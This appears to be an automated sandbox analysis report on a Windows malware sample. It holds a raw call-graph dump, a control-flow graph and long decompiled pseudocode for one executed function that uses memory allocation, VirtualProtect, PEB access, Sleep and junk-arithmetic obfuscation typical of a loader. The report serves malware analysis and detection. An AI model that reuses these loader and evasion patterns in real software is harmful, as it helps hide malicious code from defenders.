40768 40146e 53 API calls 40767->40768 40769 41574d 40768->40769 40770 40146e 53 API calls 40769->40770 40771 415760 40770->40771 40772 40146e 53 API calls 40771->40772 40773 415796 40772->40773 40774 40146e 53 API calls 40773->40774 40775 4157cf 40774->40775 40776 40146e 53 API calls 40775->40776 40777 4157ea 40776->40777 40778 40146e 53 API calls 40777->40778 40779 4157fa 40778->40779 40779->40620 40783 415e44 40780->40783 40781 415e73 40784 40146e 40781->40784 40782 4154a6 53 API calls 40782->40783 40783->40781 40783->40782 40785 4014e3 40784->40785 40786 401483 40784->40786 40906 4a93f0 40785->40906 40788 4014b1 40786->40788 40923 49da80 50 API calls 40786->40923 40788->40630 40792 49e648 40791->40792 40793 49e62f 40791->40793 40983 4a95a0 50 API calls 40792->40983 40982 49d930 54 API calls 40793->40982 40796 49e63d 40800 415972 40796->40800 40811 4159c7 40800->40811 40801 415af4 40802 415afa 40801->40802 40803 415b1f 40801->40803 40992 4aca70 46 API calls 40802->40992 40987 4158ec 40803->40987 40806 4159f5 GetPEB 40806->40811 40809 40146e 53 API calls 40810 415bf5 40809->40810 40813 49e610 55 API calls 40810->40813 40811->40801 40811->40806 40984 4b0450 40811->40984 40991 4aca70 46 API calls 40811->40991 40814 415c31 GetPEB 40813->40814 40815 415c3e GetPEB 40814->40815 40817 415d0a VirtualProtect 40815->40817 40819 415b0e 40817->40819 40819->40634 40823 41593c 40820->40823 40821 41596b 40821->40636 40822 4154a6 53 API calls 40822->40823 40823->40821 40823->40822 40835 4066d5 40824->40835 40826 40c54e VirtualAlloc 40828 40c575 40826->40828 40829 40d6e9 VirtualAlloc 40828->40829 40830 40d710 40828->40830 40829->40830 40831 40e65c VirtualAlloc 40830->40831 40832 40e683 40830->40832 40831->40832 40833 40f4b0 VirtualAlloc 40832->40833 40834 40f4d7 40832->40834 40833->40834 40834->40725 40834->40726 40844 401523 40835->40844 40838 4066fa VirtualAlloc 40840 406721 40838->40840 40839 408576 VirtualAlloc 40841 40859d 40839->40841 40840->40839 40840->40841 40842 4098b1 VirtualAlloc 40841->40842 40843 4098d8 40841->40843 40842->40843 40843->40826 40843->40828 40855 4014ef VirtualAlloc 40844->40855 40846 401534 40847 401546 VirtualAlloc 40846->40847 40849 40156d 40846->40849 40847->40849 40848 4033e4 VirtualAlloc 40850 40340b 40848->40850 40849->40848 40849->40850 40851 4045ea VirtualAlloc 40850->40851 40852 404611 40850->40852 40851->40852 40853 405666 VirtualAlloc 40852->40853 40854 40568d 40852->40854 40853->40854 40854->40838 40854->40840 40855->40846 40857 40146e 53 API calls 40856->40857 40858 415188 40857->40858 40859 40146e 53 API calls 40858->40859 40860 415198 40859->40860 40861 40146e 53 API calls 40860->40861 40862 4151a8 40861->40862 40863 40146e 53 API calls 40862->40863 40864 4151b8 40863->40864 40864->40737 40866 40146e 53 API calls 40865->40866 40867 41526a 40866->40867 40868 40146e 53 API calls 40867->40868 40869 41527a 40868->40869 40870 40146e 53 API calls 40869->40870 40871 41528a 40870->40871 40872 40146e 53 API calls 40871->40872 40873 41529a 40872->40873 40874 40146e 53 API calls 40873->40874 40875 4152aa 40874->40875 40875->40747 40877 40146e 53 API calls 40876->40877 40878 41536a 40877->40878 40879 40146e 53 API calls 40878->40879 40880 41537a 40879->40880 40881 40146e 53 API calls 40880->40881 40882 41538a 40881->40882 40883 40146e 53 API calls 40882->40883 40884 41539a 40883->40884 40885 40146e 53 API calls 40884->40885 40886 4153aa 40885->40886 40887 40146e 53 API calls 40886->40887 40888 4153ba 40887->40888 40889 40146e 53 API calls 40888->40889 40890 4153d9 40889->40890 40890->40757 40892 40146e 53 API calls 40891->40892 40893 415069 40892->40893 40894 40146e 53 API calls 40893->40894 40895 415079 40894->40895 40896 40146e 53 API calls 40895->40896 40897 41508c 40896->40897 40898 40146e 53 API calls 40897->40898 40899 4150af 40898->40899 40900 40146e 53 API calls 40899->40900 40901 4150bf 40900->40901 40902 40146e 53 API calls 40901->40902 40903 4150df 40902->40903 40904 40146e 53 API calls 40903->40904 40905 4150ef 40904->40905 40905->40763 40924 4af4d0 malloc 40906->40924 40908 4a9404 40931 4229d0 40908->40931 40910 4a9440 40911 4af4d0 44 API calls 40910->40911 40912 4a9454 40911->40912 40913 4229d0 3 API calls 40912->40913 40914 4a9490 40913->40914 40915 4af4d0 44 API calls 40914->40915 40916 4a94a4 40915->40916 40937 47b070 40916->40937 40918 4a94b3 40919 4229d0 3 API calls 40918->40919 40920 4a94e0 40919->40920 40940 4af890 40920->40940 40922 4014ef VirtualAlloc 40922->40630 40923->40788 40925 4af4e9 40924->40925 40926 4af512 40924->40926 40925->40908 40952 430590 44 API calls 40926->40952 40928 4af519 40928->40925 40953 4ab980 44 API calls 40928->40953 40930 4af524 40932 4229fd 40931->40932 40933 422a1a abort 40932->40933 40934 422a29 40932->40934 40933->40932 40954 422410 40934->40954 40936 422a36 40936->40910 40961 48c8e0 40937->40961 40941 4af89e 40940->40941 40942 4af8a0 40940->40942 40941->40922 40979 420350 GetLastError TlsGetValue SetLastError 40942->40979 40944 4af8b1 40945 4af8c0 malloc 40944->40945 40946 4af8b5 40944->40946 40947 4af8d2 40945->40947 40948 4af8e3 40945->40948 40946->40922 40980 420380 TlsSetValue 40947->40980 40951 4af8ec 40948->40951 40981 4ab980 44 API calls 40948->40981 40951->40946 40952->40928 40953->40930 40959 422427 40954->40959 40955 42257e abort 40956 4225a0 40955->40956 40957 4225cb abort 40955->40957 40956->40957 40958 4225b2 40956->40958 40957->40936 40958->40936 40959->40955 40960 42252f 40959->40960 40960->40936 40964 478790 40961->40964 40965 4787a4 strlen 40964->40965 40966 4787ae 40964->40966 40965->40966 40969 476a60 40966->40969 40968 4787c7 40968->40918 40970 476a73 40969->40970 40971 476aa0 40969->40971 40972 476a87 40970->40972 40974 4a93f0 51 API calls 40970->40974 40971->40968 40978 477170 50 API calls 40972->40978 40974->40972 40975 476ad1 40976 476b20 memcpy 40975->40976 40977 476adf 40975->40977 40976->40977 40977->40968 40978->40975 40979->40944 40980->40948 40981->40951 40982->40796 40993 427760 40984->40993 40990 4158f9 40987->40990 40988 415928 40988->40809 40989 4154a6 53 API calls 40989->40990 40990->40988 40990->40989 40991->40811 40992->40819 40996 42c630 getenv 40993->40996 40995 427793 40995->40811 41007 42c68c 40996->41007 40997 42caa3 strchr 40997->41007 40998 42c726 strchr 40998->41007 40999 42cb3b strchr 40999->41007 41000 42cc40 free 41000->40995 41002 42ad80 fputc 41003 42cb90 41002->41003 41003->41000 41003->41002 41004 42c779 strchr 41004->41007 41005 42d1f3 strchr 41005->41007 41006 42c893 strchr 41006->41007 41007->40997 41007->40998 41007->40999 41007->41003 41007->41004 41007->41005 41007->41006 41007->41007 41008 42c91e strchr 41007->41008 41009 42d4bf 41007->41009 41010 42b1b0 strchr 41007->41010 41008->41007 41010->41007 41011 428ca0 FindFirstFileA 41012 428d1e _errno GetLastError 41011->41012 41018 428cc4 41011->41018 41013 428d62 _errno 41012->41013 41014 428d31 _errno 41012->41014 41013->41018 41015 428d55 _errno 41014->41015 41016 428d3e _errno 41014->41016 41015->41018 41017 428d48 _errno 41016->41017 41016->41018 41017->41018 41019 428d70 FindNextFileA 41020 428df2 GetLastError 41019->41020 41021 428d93 41019->41021 41020->41021 41022 428dfc _errno 41020->41022 41023 4af3b0 41024 4af3c1 malloc 41023->41024 41026 4af3bc 41023->41026 41025 4af3cd 41024->41025 41024->41026 41026->41024 41027 4af3df 41026->41027 41028 4af4d0 44 API calls 41027->41028 41029 4af3eb 41028->41029 41030 4af422 malloc 41029->41030 41032 4af41d 41029->41032 41031 4af430 41030->41031 41030->41032 41032->41030 41032->41031

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 004B046C Relevance: 69.1, APIs: 6, Strings: 32, Instructions: 2596memorysleepwindowCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 0 4b046c-4b049d call 41f970 call 41031b 5 4b049f-4b04c3 VirtualAlloc 0->5 6 4b04c6-4b0adc 0->6 5->6 7 4b0ade-4b0aea 6->7 8 4b0af0-4b0c67 6->8 7->8 9 4b0c7b-4b0dab 8->9 10 4b0c69-4b0c75 8->10 11 4b0dcd-4b0ddf 9->11 12 4b0dad-4b0dc7 9->12 10->9 13 4b0def-4b0e21 11->13 14 4b0de1-4b0de9 11->14 12->11 15 4b0e23-4b0e2f 13->15 16 4b0e35-4b0efd 13->16 14->13 15->16 17 4b0eff-4b0f0b 16->17 18 4b0f11-4b0fbd 16->18 17->18 19 4b0fbf-4b0fcb 18->19 20 4b0fd1-4b0fef 18->20 19->20 21 4b0ffd-4b105e 20->21 22 4b0ff1-4b0ff7 20->22 23 4b106e-4b1642 21->23 24 4b1060-4b1068 21->24 22->21 25 4b27b9-4b27c8 23->25 26 4b1648-4b1c92 23->26 24->23 27 4b27ce-4b3016 25->27 28 4b388c-4b389e 25->28 29 4b1ca6-4b1d17 26->29 30 4b1c94-4b1ca0 26->30 35 4b302a-4b3079 27->35 36 4b3018-4b3024 27->36 33 4b38a0-4b38cd VirtualAlloc 28->33 34 4b38f5-4b38f8 28->34 31 4b1d19-4b1d22 29->31 32 4b1d28-4b1d40 29->32 30->29 31->32 37 4b1d42-4b1d4e 32->37 38 4b1d54-4b1d66 32->38 39 4b38cf-4b38f3 VirtualAlloc 33->39 40 4b3921-4b393a call 4154a6 call 49b740 GetPEB 33->40 34->40 41 4b38fa-4b3919 MessageBoxW 34->41 42 4b307b-4b3087 35->42 43 4b308d-4b309c 35->43 36->35 37->38 47 4b1d7a-4b1dcd 38->47 48 4b1d68-4b1d74 38->48 46 4b391e 39->46 67 4b393d-4b394b 40->67 41->46 42->43 44 4b309e-4b30aa 43->44 45 4b30b0-4b30e4 43->45 44->45 50 4b30f9-4b3170 45->50 51 4b30e6-4b30f3 45->51 46->40 52 4b1dcf-4b1ddb 47->52 53 4b1de1-4b1e14 47->53 48->47 55 4b3172-4b317f 50->55 56 4b3185-4b31c9 50->56 51->50 52->53 57 4b1e28-4b1efb 53->57 58 4b1e16-4b1e22 53->58 55->56 60 4b31cb-4b31d8 56->60 61 4b31de-4b31fc 56->61 62 4b1f09-4b1f4d 57->62 63 4b1efd-4b1f03 57->63 58->57 60->61 65 4b320a-4b3237 61->65 66 4b31fe-4b3204 61->66 68 4b1f5b-4b1f99 62->68 69 4b1f4f-4b1f55 62->69 63->62 70 4b3239-4b323f 65->70 71 4b3245-4b325d 65->71 66->65 72 4b3a0a-4b3a0c 67->72 73 4b3951-4b3961 67->73 74 4b1f9b-4b1fa8 68->74 75 4b1fae-4b2038 68->75 69->68 70->71 78 4b325f-4b326b 71->78 79 4b3271-4b3289 71->79 72->67 80 4b3967-4b396b 73->80 74->75 76 4b203a-4b2040 75->76 77 4b2046-4b2089 75->77 76->77 81 4b208b-4b209d 77->81 82 4b20a3-4b20cd 77->82 78->79 83 4b328b-4b3297 79->83 84 4b329d-4b3886 79->84 80->72 85 4b3971-4b3986 80->85 81->82 86 4b20cf-4b20db 82->86 87 4b20e1-4b2170 82->87 83->84 84->28 88 4b3989-4b3994 85->88 86->87 91 4b217d-4b219e 87->91 92 4b2172-4b2177 87->92 89 4b39b0-4b39c9 88->89 90 4b3996-4b39a9 88->90 95 4b39cb-4b39d1 89->95 96 4b39d7-4b39e3 89->96 93 4b39ab-4b39ae 90->93 94 4b39e5-4b3a08 FreeConsole GetPEB 90->94 97 4b21ae-4b27b3 91->97 98 4b21a0-4b21ac 91->98 92->91 93->80 99 4b3a13-4b3a21 94->99 95->96 96->88 97->25 98->97 100 4b3a23-4b3a30 99->100 101 4b3a11 99->101 102 4b3a36-4b3a39 100->102 101->99 102->101 103 4b3a3b-4b3a51 102->103 104 4b3a54-4b3a5f 103->104 105 4b3a78-4b3a8b 104->105 106 4b3a61-4b3a72 104->106 107 4b3a8d-4b3a90 105->107 108 4b3a93-4b3a9f 105->108 109 4b3aa1-4b3b76 Sleep call 415e37 106->109 110 4b3a74-4b3a76 106->110 107->108 108->104 113 4b3b7a-4b3b82 109->113 110->102 113->113 114 4b3b84-4b3c09 call 40146e 113->114 117 4b3c0d-4b3c15 114->117 117->117 118 4b3c17-4b3d7d call 49e610 call 415972 call 415e97 call 415e7a call 41592f call 49e760 117->118 131 4b3d82-4b3d96 call 49b740 118->131
                                                                                                                                                                                      C-Code - Quality: 23%
                                                                                                                                                                                      			E004B046C(void* __eflags, long long __fp0, char _a4) {
				void* _v24;
				char _v68;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				void _v103;
				char* _v104;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				intOrPtr _v216;
				signed int _v220;
				intOrPtr _v224;
				signed int _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				intOrPtr _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				intOrPtr _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				intOrPtr _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				signed int _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				signed int _v352;
				intOrPtr _v356;
				signed int _v360;
				intOrPtr _v364;
				signed int _v368;
				intOrPtr _v372;
				signed int _v376;
				intOrPtr _v380;
				signed int _v384;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				intOrPtr _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				signed int _v764;
				signed int _v768;
				signed int _v772;
				signed int _v776;
				signed int _v780;
				signed int _v784;
				signed int _v788;
				signed int _v792;
				signed int _v796;
				signed int _v800;
				signed int _v804;
				signed int _v808;
				signed int _v812;
				signed int _v816;
				signed int _v820;
				signed int _v824;
				signed int _v828;
				intOrPtr _v832;
				signed int _v836;
				signed int _v840;
				signed int _v844;
				signed int _v848;
				signed int _v852;
				signed int _v856;
				signed int _v860;
				signed int _v864;
				signed int _v868;
				intOrPtr _v872;
				intOrPtr _v884;
				void* _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				void* _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				void* _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				long long _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				void* _v956;
				intOrPtr _v960;
				void* _v964;
				intOrPtr _v968;
				void* _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				void* _v984;
				char* _v988;
				void* _v992;
				char* _v996;
				char* _v1000;
				char* _v1004;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t2386;
				signed int _t2387;
				signed int _t2494;
				signed int _t2516;
				void* _t2810;
				signed int _t2811;
				intOrPtr _t2816;
				signed int _t2822;
				int _t2828;
				signed int _t2830;
				int _t2834;
				void* _t2837;
				signed int _t2841;
				signed int _t2997;
				signed int _t3219;
				signed int _t3415;
				void* _t3462;
				void* _t3464;
				signed int _t3466;
				signed int _t3468;
				void* _t3470;
				void* _t3471;
				signed int _t3473;
				void* _t3501;
				void* _t3520;
				void* _t3560;
				void* _t3574;
				signed int _t3577;
				signed int _t3580;
				signed int _t3581;
				signed int _t3583;
				void* _t3584;
				intOrPtr* _t3590;
				signed int _t3654;
				intOrPtr _t3662;
				void* _t3663;
				signed int _t3668;
				signed int _t3747;
				signed int _t3750;
				intOrPtr* _t3800;
				intOrPtr* _t3801;
				void* _t3804;
				signed int _t3822;
				void* _t4014;
				signed int _t4019;
				void* _t4022;
				void* _t4023;
				signed int _t4119;
				signed int _t4121;
				signed int _t4122;
				void** _t4123;
				void* _t4128;
				long long _t4203;

				_t4203 = __fp0;
				_t4128 = __eflags;
				_t3528 =  &_a4;
				_t4122 = _t4121 & 0xfffffff0;
				_t2 = _t3528 - 4; // 0xaf1e4
				_push( *_t2);
				_t4119 = _t4122;
				_push( &_a4);
				_t4123 = _t4122 - 0x3d8;
				E0041F970(); // executed
				_t2386 = E0041031B(_t4128); // executed
				_t4014 = _t2386;
				_t2387 = _t2386 + 0xe9;
				_v308 = _t2387;
				if(_t2387 < 0xffffff80) {
					_v996 = 4;
					_v1000 = 0x1000;
					_v1004 = 0xb2;
					 *_t4123 = 0; // executed
					VirtualAlloc(??, ??, ??, ??); // executed
					_t4123 = _t4123 - 0x10;
				}
				_t7 = _t4014 + 0x145; // 0x145
				_t8 = _t4014 + 0x197; // 0x197
				_t9 = _t4014 + 0x17e; // 0x17e
				_t3799 = _t9;
				_t10 = _t4014 + 0x12b; // 0x12b
				_t11 = _t4014 + 0x19a; // 0x19a
				_t3415 = _t11;
				_v312 = _t7;
				_t13 = _t4014 + 0x14d; // 0x14d
				_v564 = _t13;
				_t15 = _t4014 + 0xf7; // 0xf7
				_v316 = _t15;
				_t17 = _t4014 + 0x168; // 0x168
				_v320 = _t17;
				_t19 = _t4014 + 0x15e; // 0x15e
				_v140 = _t19;
				_t21 = _t4014 + 0x153; // 0x153
				_v152 = _t21;
				_t23 = _t4014 + 0x1a4; // 0x1a4
				_v192 = _t23;
				_t25 = _t4014 + 0x121; // 0x121
				_v568 = _t25;
				_t27 = _t4014 + 0x11d; // 0x11d
				_v324 = _t27;
				_t29 = _t4014 + 0x122; // 0x122
				_v328 = _t29;
				_t31 = _t4014 + 0xfa; // 0xfa
				_v572 = _t31;
				_t33 = _t4014 + 0x150; // 0x150
				_v332 = _t33;
				_t35 = _t4014 + 0x154; // 0x154
				_v336 = _t35;
				_t37 = _t4014 + 0x16c; // 0x16c
				_v196 = _t37;
				_t39 = _t4014 + 0x101; // 0x101
				_v340 = _t39;
				_t41 = _t4014 + 0x160; // 0x160
				_v344 = _t41;
				_t43 = _t4014 + 0x148; // 0x148
				_v348 = _t43;
				_t45 = _t4014 + 0x173; // 0x173
				_v576 = _t45;
				_t47 = _t4014 + 0x116; // 0x116
				_v156 = _t47;
				_t49 = _t4014 + 0x155; // 0x155
				_v200 = _t49;
				_t51 = _t4014 + 0x137; // 0x137
				_v580 = _t51;
				_t53 = _t4014 + 0x128; // 0x128
				_v204 = _t53;
				_t55 = _t4014 + 0x1ac; // 0x1ac
				_v584 = _t55;
				_t57 = _t4014 + 0x124; // 0x124
				_v588 = _t57;
				_t59 = _t4014 + 0x17c; // 0x17c
				_v592 = _t59;
				_t61 = _t4014 + 0x1b0; // 0x1b0
				_v352 = _t61;
				_t63 = _t4014 + 0xec; // 0xec
				_v208 = _t63;
				_t65 = _t4014 + 0x13c; // 0x13c
				_v212 = _t65;
				_t67 = _t4014 + 0x106; // 0x106
				_v596 = _t67;
				_t69 = _t4014 + 0x191; // 0x191
				_v216 = _t69;
				_t71 = _t4014 + 0x161; // 0x161
				_v220 = _t71;
				_t73 = _t4014 + 0x120; // 0x120
				_v224 = _t73;
				_t75 = _t4014 + 0x103; // 0x103
				_v600 = _t75;
				_t77 = _t4014 + 0x15c; // 0x15c
				_v356 = _t77;
				_t79 = _t4014 + 0x176; // 0x176
				_v360 = _t79;
				_t81 = _t4014 + 0x12b; // 0x12b
				_v364 = _t81;
				_t83 = _t4014 + 0x17d; // 0x17d
				_v604 = _t83;
				_t85 = _t4014 + 0x10d; // 0x10d
				_v368 = _t85;
				_t87 = _t4014 + 0xf9; // 0xf9
				_v132 = _t87;
				_t89 = _t4014 + 0x100; // 0x100
				_v160 = _t89;
				_t91 = _t4014 + 0xfb; // 0xfb
				_v372 = _t91;
				_t93 = _t4014 + 0x108; // 0x108
				_v376 = _t93;
				_t95 = _t4014 + 0x140; // 0x140
				_v608 = _t95;
				_t97 = _t4014 + 0x18b; // 0x18b
				_v612 = _t97;
				_t99 = _t4014 + 0xee; // 0xee
				_v616 = _t99;
				_t101 = _t4014 + 0x183; // 0x183
				_v228 = _t101;
				_t103 = _t4014 + 0x199; // 0x199
				_v144 = _t103;
				_t105 = _t4014 + 0x163; // 0x163
				_v620 = _t105;
				_t107 = _t4014 + 0xf1; // 0xf1
				_v380 = _t107;
				_t109 = _t4014 + 0xfd; // 0xfd
				_v164 = _t109;
				_t111 = _t4014 + 0x1ab; // 0x1ab
				_v384 = _t111;
				_t113 = _t4014 + 0xf3; // 0xf3
				_v624 = _t113;
				_t115 = _t4014 + 0x164; // 0x164
				_v388 = _t115;
				_t117 = _t4014 + 0x13a; // 0x13a
				_v628 = _t117;
				_t119 = _t4014 + 0x175; // 0x175
				_v392 = _t119;
				_t121 = _t4014 + 0x179; // 0x179
				_v396 = _t121;
				_t123 = _t4014 + 0x10c; // 0x10c
				_v632 = _t123;
				_t125 = _t4014 + 0xf5; // 0xf5
				_v400 = _t125;
				_t127 = _t4014 + 0x12f; // 0x12f
				_v404 = _t127;
				_t129 = _t4014 + 0x129; // 0x129
				_v232 = _t129;
				_t131 = _t4014 + 0x15b; // 0x15b
				_v636 = _t131;
				_t133 = _t4014 + 0x165; // 0x165
				_v640 = _t133;
				_t135 = _t4014 + 0x109; // 0x109
				_v136 = _t135;
				_t137 = _t4014 + 0x1a6; // 0x1a6
				_v236 = _t137;
				_t139 = _t4014 + 0x151; // 0x151
				_v408 = _t139;
				_t141 = _t4014 + 0x16e; // 0x16e
				_v644 = _t141;
				_t143 = _t4014 + 0x18a; // 0x18a
				_v648 = _t143;
				_t145 = _t4014 + 0x157; // 0x157
				_v412 = _t145;
				_t147 = _t4014 + 0x118; // 0x118
				_v168 = _t147;
				_t149 = _t4014 + 0x13f; // 0x13f
				_v240 = _t149;
				_t151 = _t4014 + 0x107; // 0x107
				_v244 = _t151;
				_t153 = _t4014 + 0x1a9; // 0x1a9
				_v416 = _t153;
				_t155 = _t4014 + 0x111; // 0x111
				_v172 = _t155;
				_t157 = _t4014 + 0x12d; // 0x12d
				_v420 = _t157;
				_t159 = _t4014 + 0x102; // 0x102
				_v652 = _t159;
				_t161 = _t4014 + 0x17f; // 0x17f
				_v424 = _t161;
				_t163 = _t4014 + 0x15a; // 0x15a
				_v248 = _t163;
				_t165 = _t4014 + 0x169; // 0x169
				_v656 = _t165;
				_t167 = _t4014 + 0x156; // 0x156
				_v428 = _t167;
				_t169 = _t4014 + 0x19e; // 0x19e
				_v660 = _t169;
				_t171 = _t4014 + 0x149; // 0x149
				_v432 = _t171;
				_t173 = _t4014 + 0x142; // 0x142
				_v664 = _t173;
				_t175 = _t4014 + 0xeb; // 0xeb
				_v436 = _t175;
				_t177 = _t4014 + 0x11a; // 0x11a
				_v252 = _t177;
				_t179 = _t4014 + 0x192; // 0x192
				_v668 = _t179;
				_t181 = _t4014 + 0x15d; // 0x15d
				_v440 = _t181;
				_t183 = _t4014 + 0x134; // 0x134
				_v672 = _t183;
				_t185 = _t4014 + 0x182; // 0x182
				_v444 = _t185;
				_t187 = _t4014 + 0x119; // 0x119
				_v256 = _t187;
				_t189 = _t4014 + 0x113; // 0x113
				_v676 = _t189;
				_t191 = _t4014 + 0x19c; // 0x19c
				_v148 = _t191;
				_t193 = _t4014 + 0x10a; // 0x10a
				_v448 = _t193;
				_t195 = _t4014 + 0xf4; // 0xf4
				_v260 = _t195;
				_t197 = _t4014 + 0x170; // 0x170
				_v452 = _t197;
				_t199 = _t4014 + 0x115; // 0x115
				_v264 = _t199;
				_t201 = _t4014 + 0x14c; // 0x14c
				_v680 = _t201;
				_t203 = _t4014 + 0x181; // 0x181
				_v268 = _t203;
				_t205 = _t4014 + 0x136; // 0x136
				_v184 = _t205;
				_t207 = _t4014 + 0x19f; // 0x19f
				_v684 = _t207;
				_v460 = _t8;
				_t210 = _t4014 + 0x135; // 0x135
				_t211 = _t4014 + 0x195; // 0x195
				_v188 = _t10;
				_v464 = _t210;
				_t214 = _t4014 + 0x10b; // 0x10b
				_v688 = _t211;
				_t216 = _t4014 + 0x144; // 0x144
				_v708 = _t214;
				_t218 = _t4014 + 0x14a; // 0x14a
				_v176 = _t216;
				_t220 = _t4014 + 0x117; // 0x117
				_v712 = _t218;
				_t222 = _t4014 + 0x18d; // 0x18d
				_v692 = _t220;
				_t224 = _t4014 + 0x16b; // 0x16b
				_v272 = _t222;
				_t226 = _t4014 + 0xff; // 0xff
				_v696 = _t224;
				_t228 = _t4014 + 0x130; // 0x130
				_v716 = _t226;
				_t230 = _t4014 + 0x159; // 0x159
				_v700 = _t228;
				_t232 = _t4014 + 0x13b; // 0x13b
				_v276 = _t230;
				_t234 = _t4014 + 0x189; // 0x189
				_v704 = _t232;
				_t236 = _t4014 + 0x11b; // 0x11b
				_v720 = _t234;
				_t238 = _t4014 + 0x13d; // 0x13d
				_v456 = _t236;
				_t240 = _t4014 + 0x147; // 0x147
				_t2494 = _t240;
				_v724 = _t238;
				_t242 = _t4014 + 0xf2; // 0xf2
				_v728 = _t242;
				_t244 = _t4014 + 0x131; // 0x131
				_v468 = _t244 * _v420;
				_t247 = _t4014 + 0x120; // 0x120
				_v280 = _t247 + _t3799;
				_t249 = _t4014 + 0x12b; // 0x12b
				_v284 = _t249 + _v160;
				_t252 = _t4014 + 0xec; // 0xec
				_v288 = _t252 + _v168;
				_t255 = _t4014 + 0xf3; // 0xf3
				_v472 = _t255 * _v136;
				_t258 = _t4014 + 0x140; // 0x140
				_v476 = _t258 * _v276;
				_t261 = _t4014 + 0x128; // 0x128
				_v480 = _t261 * _v172;
				_t264 = _t4014 + 0xf9; // 0xf9
				if(_v316 <= _t264 * _v148) {
					_t267 = _t4014 + 0xfd; // 0xfd
					_v188 = _t267 + _v244;
				}
				_t270 = _t4014 + 0xec; // 0xec
				_v484 = _t270 * _v268;
				_t273 = _t4014 + 0x10c; // 0x10c
				_v732 = _t273 * _t3415;
				_v736 = _t3415 * _v212;
				_t277 = _t4014 + 0x10d; // 0x10d
				_v488 = _t277 * _v136;
				_t280 = _t4014 + 0x168; // 0x168
				_v292 = _t280 * _v156;
				_t283 = _t4014 + 0x160; // 0x160
				_v296 = _t283 + _v368;
				_t286 = _t4014 + 0x165; // 0x165
				_v180 = _t286 + _t3799;
				_v744 = _t2494 * _v180;
				_t292 = _t4014 + 0x191; // 0x191
				_v740 = _v468 * _v180;
				_t296 = _t4014 + 0x153; // 0x153
				_v184 = (_t292 + _v184) * _v276;
				_t299 = _t4014 + 0x109; // 0x109
				_v492 = _t296 * _v412;
				_t302 = _t4014 + 0xeb; // 0xeb
				_v496 = _t299 * _v292;
				_t304 = _t4014 + 0x19c; // 0x19c
				_v748 = _t304 + _v292;
				_t307 = _t4014 + 0xf4; // 0xf4
				_v752 = _t307 * _v176;
				_t310 = _t4014 + 0x199; // 0x199
				_v756 = _t310 * _v264;
				_t313 = _t4014 + 0x15e; // 0x15e
				_v760 = _t313 * _v144;
				_t316 = _t4014 + 0x116; // 0x116
				_v560 = _t302;
				_v300 = _t316 * _v164;
				_t321 = _t4014 + 0x17c; // 0x17c
				_v500 = _t321 * _v136;
				_t324 = _t4014 + 0x10c; // 0x10c
				_v504 = _t324 * _v428;
